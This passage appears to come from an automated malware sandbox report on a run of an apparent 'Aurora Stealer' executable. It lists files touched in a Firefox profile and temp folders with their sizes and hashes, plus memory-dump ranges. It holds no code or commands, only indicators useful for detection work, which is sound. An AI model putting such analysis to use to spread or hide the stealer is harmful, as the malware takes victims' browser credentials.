                          7bfc325de2e448380fe3ae921dddd5b4ab94432d60487d662d7b10ef2b248969

                          SHA512

                          def7a5405fda0692f8bf7dbc7cfb67e2e38c6a3391b52209cf73b43b2773216e7bc399e8449d752db6fa6910387f22d7a2cd2a543f30983d13603f75a52345f0

                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                          Filesize

                          479KB

                          MD5

                          09372174e83dbbf696ee732fd2e875bb

                          SHA1

                          ba360186ba650a769f9303f48b7200fb5eaccee1

                          SHA256

                          c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                          SHA512

                          b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                          Filesize

                          13.8MB

                          MD5

                          0a8747a2ac9ac08ae9508f36c6d75692

                          SHA1

                          b287a96fd6cc12433adb42193dfe06111c38eaf0

                          SHA256

                          32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                          SHA512

                          59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\AlternateServices.bin

                          Filesize

                          8KB

                          MD5

                          d98b5816d25a9ff21331aec0f06967cd

                          SHA1

                          04783df479987c770a658e96a409265cdaca28b9

                          SHA256

                          ba6f7fec1d5db5d6b0474e58d189c2383532177e5f9c7d1610acd8b5fae88c1e

                          SHA512

                          764fd4111ffe9433808ca3ac21136d65b04db5f3c0c665c2345d9a3a97f7de1393b8b7b354623c68f70e50a25cdea2bed449d60fc7da2bacdd35f6858ac4deb8

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\db\data.safe.tmp

                          Filesize

                          6KB

                          MD5

                          62e3dd9b224462ec84e215cdd527737b

                          SHA1

                          84d94e3817a8a87e8e25f3c900c6bae55e059e79

                          SHA256

                          b753e4e348144dc8c81ee2d042178cc3a2ec7da739c258c171014d24b70cfef3

                          SHA512

                          2fb14284314a3ed8ecc48905085ec7ac7b4bc0be023d029bb9b614a2c7da06e12d7d6808b549ca4e1b5743c281cbb79bb9535118fcf2ab086429b8af43d57f97

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\db\data.safe.tmp

                          Filesize

                          5KB

                          MD5

                          ee25d04535607eeb2724f43d956a1e79

                          SHA1

                          c46b08cb8228589bf3a294a8c23f84ad944b0d81

                          SHA256

                          497e6f19b932a82154732ba68267d1f169e1fd7d9dcea93a2ceab244a6cccb89

                          SHA512

                          0a822ddfe4cfb36f76f4251467323391e33c7893f575b3ef259eb3ef239be63381e6db93d85525c92186e80c19fb979c0717b9234cb6fd4acb91cdbf4b370563

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\pending_pings\016f1fb2-f953-4559-b1de-f1feeb3cf6d5

                          Filesize

                          982B

                          MD5

                          704e5b85eca4aae83c54976ada9c5265

                          SHA1

                          518d0616ef28c686e89c2304486cdcb3353f577f

                          SHA256

                          552a44e986a834ff6f2e7a0c96dcb0fd8d010df2095e524a517f1f05cfb9ff04

                          SHA512

                          d92a74e95e9d6c6b7876b790bd3a7cc06a16ca88fb5edaad6c23c29d046869b39034dfff705a1f15e8e25c48535b30aaefe4f74ce4b22012ddaca58a4867bf27

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\pending_pings\36692877-92f2-4f44-93c4-05ba8738f84e

                          Filesize

                          26KB

                          MD5

                          c522c04bc98276e9c7b4764a57f8c4fa

                          SHA1

                          d75e25805b5e2101b4e3ab5f8eab14aa7eef98ef

                          SHA256

                          80a2c08546c87a2e1406062f21aca292be233c0a1fb813244cf3242c719fa2e7

                          SHA512

                          fa37be3e409e21588f917514ae236d37c753896b49087d02705db4361a43d972ea359a5f87a4f3dbe7015a3ce76fe452a56361f1316aeef5b892e27f2ac53bd7

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\pending_pings\e8c00e6e-16fd-4040-9f11-e012c4fd620f

                          Filesize

                          671B

                          MD5

                          aafde1f36659bba4538167e39fa1ba63

                          SHA1

                          211f6eca134683b5e0480e37feb9769bc82a278b

                          SHA256

                          0877e375ba02939ee89a468b98d3c9bc15ae9430492bdc630665c4b000bc98fc

                          SHA512

                          2747614f7537eb65828682a548e9adab7989922ba0a6aebdd57857d0888725fe350dd90a483a90bdcd991ac0bc648a8080a3cac111f326f350bb4bbd09b334af

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                          Filesize

                          1.1MB

                          MD5

                          842039753bf41fa5e11b3a1383061a87

                          SHA1

                          3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                          SHA256

                          d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                          SHA512

                          d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                          Filesize

                          116B

                          MD5

                          2a461e9eb87fd1955cea740a3444ee7a

                          SHA1

                          b10755914c713f5a4677494dbe8a686ed458c3c5

                          SHA256

                          4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                          SHA512

                          34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                          Filesize

                          372B

                          MD5

                          bf957ad58b55f64219ab3f793e374316

                          SHA1

                          a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                          SHA256

                          bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                          SHA512

                          79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                          Filesize

                          17.8MB

                          MD5

                          daf7ef3acccab478aaa7d6dc1c60f865

                          SHA1

                          f8246162b97ce4a945feced27b6ea114366ff2ad

                          SHA256

                          bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                          SHA512

                          5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\prefs-1.js

                          Filesize

                          12KB

                          MD5

                          e988399bc04ca23cb094fc8185df83be

                          SHA1

                          bdf53e5eb13e7a88290a30022b23a79693cc29d1

                          SHA256

                          ce8a4ded67544b58c8af88abfd08ceeeac31438dd5310ef1cef9a73ce5c99221

                          SHA512

                          b1ea4fbbdb78edf8172487d4466fcfec217bf10a2e097a360b593158eb472b1f7915949425e6e14c7b0ffbb2808557314f3411296c8d8bff6adff8395d876ab4

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\prefs-1.js

                          Filesize

                          11KB

                          MD5

                          0f9b5176132ef6bf1daf524a76c6d886

                          SHA1

                          bee882a5f437736b83b8419740f798bdc251c1b6

                          SHA256

                          0044bfcb0bd05fbf42d00fa9a9e14ef4832c3d236f0f95fa7066a5b6d58e19af

                          SHA512

                          cc3653962213bfdf851dbeb70ea4ba2fba3984e9d059f7fc3fc7131fe7662a02ddc2eb9966c5722d856f16ff355e1f5daed981a5cfa3504b690c24a18df4fdc9

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\prefs.js

                          Filesize

                          8KB

                          MD5

                          45e75173c492b474ec441a9be75281f1

                          SHA1

                          6655fae127841da9ff77b4ecd1908ee3083419ad

                          SHA256

                          661de561e3160b6912458b8e4e53b0550e4a7e338b940fccecbb5cef517c643f

                          SHA512

                          b34994c7f36902df69b0aca46616ed029bbfe0c93effafe632e14d5d76930aa2c7edd51fbaf3f5f2ac8a28b023a4994e19781d86455bd0f8b8e2bcceb2f452e7

                        • C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe

                          Filesize

                          25.5MB

                          MD5

                          ad9eddce12966e365ddb9b7fdae91340

                          SHA1

                          7f7bc6ceb99c67e01423c6f171df03f92771224e

                          SHA256

                          f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6

                          SHA512

                          82932ed99e4a87730b3fda8d4bff0cae261dede6a36a25eae670b10f7d2b6903c2576b4cf8f9d263d9ec8ff22a05b967e039e0d299195bb6aad7f0445bdf2522

                        • C:\Users\Admin\Downloads\p7rSxRKB.rar.part

                          Filesize

                          10.9MB

                          MD5

                          7077d053f377ac289bde8e57de60f4a5

                          SHA1

                          779664f5ff55cd1035e58f2f5568e8a41a370288

                          SHA256

                          282cd2c35141a47148dae9a17263d20edf209dca310112ebb11c47710091fdf7

                          SHA512

                          9118b53f275784ad90a3a7bfc5cd578a51fb000bff5d9beab14a4c47b3e2ba8b7c005530c3871166172f6edf090c9763d811225bedeb2327c8034d2a67511a67

                        • memory/2028-1589-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1581-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1591-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1588-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1587-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1586-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1585-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1580-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1590-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2028-1579-0x0000025CE3ED0000-0x0000025CE3ED1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2436-1649-0x0000000000400000-0x0000000001D8A000-memory.dmp

                          Filesize

                          25.5MB

                        • memory/2448-1566-0x000001EB63F40000-0x000001EB63F62000-memory.dmp

                          Filesize

                          136KB

                        • memory/2576-1696-0x000002743A080000-0x000002743A1CE000-memory.dmp

                          Filesize

                          1.3MB

                        • memory/2940-1576-0x00007FF7C7340000-0x00007FF7C8C4B000-memory.dmp

                          Filesize

                          25.0MB

                        • memory/3480-1683-0x0000000000400000-0x0000000001D8A000-memory.dmp

                          Filesize

                          25.5MB

                        • memory/3632-1684-0x00007FF7C1370000-0x00007FF7C2C7B000-memory.dmp

                          Filesize

                          25.0MB

                        • memory/3676-1612-0x0000000000400000-0x0000000001D8A000-memory.dmp

                          Filesize

                          25.5MB

                        • memory/3692-1563-0x00000000007F0000-0x0000000000808000-memory.dmp

                          Filesize

                          96KB

                        • memory/4516-1625-0x00007FF668680000-0x00007FF669F8B000-memory.dmp

                          Filesize

                          25.0MB

                        • memory/4984-1562-0x0000000000400000-0x0000000001D8A000-memory.dmp

                          Filesize

                          25.5MB

                        • memory/5844-1661-0x00007FF68E0D0000-0x00007FF68F9DB000-memory.dmp

                          Filesize

                          25.0MB